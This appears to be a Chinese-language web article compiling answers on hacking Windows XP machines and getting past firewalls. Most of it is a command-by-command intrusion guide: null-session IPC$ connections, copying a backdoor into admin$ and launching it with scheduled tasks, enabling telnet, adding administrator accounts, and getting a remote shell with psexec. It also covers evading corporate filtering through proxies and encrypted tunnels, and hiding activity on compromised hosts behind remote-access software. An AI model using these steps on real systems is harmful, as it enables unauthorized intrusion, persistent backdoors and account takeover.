文章大纲：

• 1、如何入侵内网中。瑞星防火墙+杀毒软件的XP系统
• 2、如何入侵有防火墙的主机?
• 3、防火墙入侵
• 4、怎么破解防火墙
• 5、黑客入侵网站时，怎样绕过防火墙？

如何入侵内网中。瑞星防火墙+杀毒软件的XP系统

1 ）建立空连接 :

net use \\127.0.0.1\ipc$ "" /user:""

2 ）建立非空连接 :

net use \\127.0.0.1\ipc$ " 密码 " /user:" 用户名 "

3 ）删除连接 :

net use \\127.0.0.1\ipc$ /del

2 在 ipc$ 连接中对远程主机的操作命令

1 ） 查看远程主机的共享资源（看不到默认共享） :

net view \\127.0.0.1

2 ） 查看远程主机的当前时间 :

net time \\127.0.0.1

3 ） 得到远程主机的 netbios 用户名列表 :

nbtstat -A 127.0.0.1

4 ）映射 / 删除远程共享 :

net use z: \\127.0.0.1\c

此命令将共享名为 c 的共享资源映射为本地 z 盘

net use z: /del

删除映射的 z 盘，其他盘类推

5 ）向远程主机复制文件 :

copy 路径 \ 文件名 \\IP\ 共享目录名，如：

copy c:\xinxin.exe \\127.0.0.1\c$ 即将 c 盘下的 xinxin.exe 复制到对方 c 盘内

当然，你也可以把远程主机上的文件复制到自己的机器里：

copy \\127.0.0.1\c$\xinxin.exe c:\

6 ）远程添加计划任务 :

at \\IP 时间 程序名 如：

at \\127.0.0.0 11:00 xinxin.exe

注意：时间尽量使用 24 小时制；如果你打算运行的程序在系统默认搜索路径（比如 system32/ ）下则不用加路径，否则必须加全路径

3 本地命令

1 ）查看本地主机的共享资源（可以看到本地的默认共享）

net share

2 ）得到本地主机的用户列表

net user

3 ）显示本地某用户的帐户信息

net user 帐户名

4 ）显示本地主机当前启动的服务

net start

5 ）启动 / 关闭本地服务

net start 服务名

net stop 服务名

6 ）在本地添加帐户

net user 帐户名 密码 /add

7 ）激活禁用的用户

net uesr 帐户名 /active:yes

8 ）加入管理员组

net localgroup administrators 帐户名 /add

很显然的是，虽然这些都是本地命令，但如果你在远程主机的 shell 中输入，比如你 telnet 成功后输入上面这些命令，那么这些本地输入将作用在远程主机上。

4 其他一些命令

1 ） telnet

telnet IP 端口

telnet 127.0.0.0 23

2 ）用 opentelnet.exe 开启远程主机的 telnet

OpenTelnet.exe \\ip 管理员帐号 密码 NTLM 的认证方式 port

OpenTelnet.exe \\127.0.0.1 administrator "" 1 90

不过这个小工具需要满足四个要求：

1 ）目标开启了 ipc$ 共享

2 ）你要拥有管理员密码和帐号

3 ）目标开启 RemoteRegistry 服务，用户就可以更改 ntlm 认证

4 ）对仅 WIN2K/XP 有效

3 ）用 psexec.exe 一步获得 shell ，需要 ipc 管道支持

psexec.exe \\IP -u 管理员帐号 -p 密码 cmd

psexec.exe \\127.0.0.1 -u administrator -p "" cmd

十三 对比过去和现今的 ipc$ 入侵

既然是对比，那么我就先把过去的 ipc$ 入侵步骤写给大家，都是蛮经典的步骤：

[1]

C:\net use \\127.0.0.1\ipc$ "" /user:admintitrators

\\ 用扫到的空口令建立连接

[2]

c:\net view \\127.0.0.1

\\ 查看远程的共享资源

[3]

C:\copy srv.exe \\127.0.0.1\admin$\system32

\\ 将一次性后门 srv.exe 复制到对方的系统文件夹下，前提是 admin$ 开启

[4]

C:\net time \\127.0.0.1

\\ 查看远程主机的当前时间

[5]

C:\at \\127.0.0.1 时间 srv.exe

\\ 用 at 命令远程运行 srv.exe ，需要对方开启了 'Task Scheduler' 服务

[6]

C:\net time \\127.0.0.1

\\ 再次查看当前时间来估算 srv.exe 是否已经运行，此步可以省略

[7]

C:\telnet 127.0.0.1 99

\\ 开一个新窗口，用 telnet 远程登陆到 127.0.0.1 从而获得一个 shell( 不懂 shell 是什么意思？那你就把它想象成远程机器的控制权就好了，操作像 DOS) ， 99 端口是 srv.exe 开的一次性后门的端口

[8]

C:\WINNT\system32net start telnet

\\ 我们在刚刚登陆上的 shell 中启动远程机器的 telnet 服务，毕竟 srv.exe 是一次性的后门，我们需要一个长久的后门便于以后访问，如果对方的 telnet 已经启动，此步可省略

[9]

C:\copy ntlm.exe \\127.0.0.1\admin$\system32

\\ 在原来那个窗口中将 ntlm.exe 传过去， ntlm.exe 是用来更改 telnet 身份验证的

[10]

C:\WINNT\system32ntlm.exe

\\ 在 shell 窗口中运行 ntlm.exe ，以后你就可以畅通无阻的 telnet 这台主机了

[11]

C:\telnet 127.0.0.1 23

\\ 在新窗口中 telnet 到 127.0.0.1 ，端口 23 可省略，这样我们又获得一个长期的后门

[12]

C:\WINNT\system32net user 帐户名 密码 /add

C:\WINNT\system32net uesr guest /active:yes

C:\WINNT\system32net localgroup administrators 帐户名 /add

\\telnet 上以后，你可以建立新帐户，激活 guest ，把任何帐户加入管理员组等

好了，写到这里我似乎回到了 2 ， 3 年前，那时的 ipc$ 大家都是这么用的，不过随着新工具的出现，上面提到的一些工具和命令现在已经不常用到了，那就让我们看看现在的高效而简单的 ipc$ 入侵吧。

[1]

psexec.exe \\IP -u 管理员帐号 -p 密码 cmd

\\ 用这个工具我们可以一步到位的获得 shell

OpenTelnet.exe \\server 管理员帐号 密码 NTLM 的认证方式 port

\\ 用它可以方便的更改 telnet 的验证方式和端口，方便我们登陆

[2]

已经没有第二步了，用一步获得 shell 之后，你做什么都可以了，安后门可以用 winshell ，克隆就用 ca 吧，开终端用 3389.vbe ，记录密码用 win2kpass ，总之好的工具不少，随你选了，我就不多说了。

如何入侵有防火墙的主机?

严格意义上说没有电脑是不可以侵入的，只是难度上有大小而已。不过这是一个违法的行为。不建议学习。如果想知道可以在baidu里搜寻一下。有很多的黑客软件可以直接用的。 比如说冰河什么的

防火墙入侵

防火墙提示系统被攻击

常见的个人防火墙程序所谓的“攻击”并不一定是真正的 *** 攻击，很多防火墙程序会将 *** 广播等最常见的 *** 访问当作攻击来提示我们并记录下来（局域网内此类的提示尤其多）。另外的“攻击”则可能是有人在扫描你计算机的端口，或者是其他人中了病毒，病毒在利用染毒的计算机扫描 *** 上的其他电脑。

一般这种情况，只要你定期更新了系统补丁，这些所谓的“攻击”一般是不会造成任何威胁的。

个人认为防火墙程序的这种提示也是一种变相的“广告”而已－－你看我多么地有用啊，功能多强大！ *** 上有这么多的攻击，我都替你拦截了，用我是没有错的！－－要真有了攻击，它告诉你没有拦截住，你还会用它吗？我估计你是会马上换防火墙了，对吧？

怎么破解防火墙

可能现在对局域网上网用户限制比较多，比如不能上一些网站，不能玩某些游戏，不能上MSN，端口限制等等，一般就是通过 *** 服务器上的软件进行限制，如现在谈的最多的ISA Server 2004，或者是通过硬件防火墙进行过滤。下面谈谈如何突破限制，需要分限制情况进行说明：

一、单纯的限制某些网站，不能访问， *** 游戏（比如联众）不能玩，这类限制一般是限制了欲访问的IP地址。

对于这类限制很容易突破，用普通的HTTP *** 就可以了，或者SOCKS *** 也是可以的。现在网上找HTTP *** 还是很容易的，一抓一大把。在IE里加了HTTP *** 就可以轻松访问目的网站了。

二、限制了某些协议，如不能FTP了等情况，还有就是限制了一些 *** 游戏的服务器端IP地址，而这些游戏又不支持普通HTTP *** 。

这种情况可以用SOCKS *** ，配合Sockscap32软件，把软件加到SOCKSCAP32里，通过SOCKS *** 访问。一般的程序都可以突破限制。对于有些游戏，可以考虑Permeo Security Driver 这个软件。如果连SOCKS也限制了，那可以用socks2http了，不会连HTTP也限制了吧。

三、基于包过滤的限制，或者禁止了一些关键字。这类限制就比较强了，一般是通过 *** 服务器或者硬件防火墙做的过滤。比如：通过ISA Server 2004禁止MSN ，做了包过滤。这类限制比较难突破，普通的 *** 是无法突破限制的。

这类限制因为做了包过滤，能过滤出关键字来，所以要使用加密 *** ，也就是说中间走的HTTP或者SOCKS *** 的数据流经过加密，比如跳板，SSSO， FLAT等，只要 *** 加密了就可以突破了， 用这些软件再配合Sockscap32，MSN就可以上了。 这类限制就不起作用了。

四、基于端口的限制，限制了某些端口，最极端的情况是限制的只有80端口可以访问，也就只能看看网页，连OUTLOOK收信，FTP都限制了。当然对于限制几个特殊端口，突破原理一样。

这种限制可以通过以下办法突破：

1、找普通HTTP80端口的 *** ，12.34.56.78:80，象这样的，配合socks2http，把HTTP *** 装换成SOCKS *** ，然后再配合SocksCap32，就很容易突破了。这类突破办法中间走的 *** 未 加密。通通通软件也有这个功能。

2、用类似FLAT软件，配合SocksCap32，不过所做的FLAT *** 更好也是80端口，当然不是80端口也没关系，因为FLAT还支持再通过普通的HTTP *** 访问，不是80端口，就需要再加一个80端口的HTTP *** 。这类突破办法中间走的 *** 加密，网管不知道中间所走的数据是什么。 *** 跳板也可以做到，不过 *** 仍然要80端口的。对于单纯是80端口限制，还可以用一些端口转换的技术突破限制。

五、以上一些限制综合的，比如有限制IP的，也有限制关键字，比如封MSN，还有限制端口的情况。

一般用第四种情况的第二个办法就可以完全突破限制。只要还允许上网，呵呵，所有的限制都可以突破。

黑客入侵网站时，怎样绕过防火墙？

不是防火墙察觉不到，而是防火墙认为他是合法用户，合法操作，所以防火墙是不会报警的

要不被防火墙察觉到，就要在入侵了的机器上使用以经授权的程序 比如黑客可以使用PCANYWHERE远程接入肉J 之后进行一切操作 而防火墙是会认为这是合法的 所以不会报警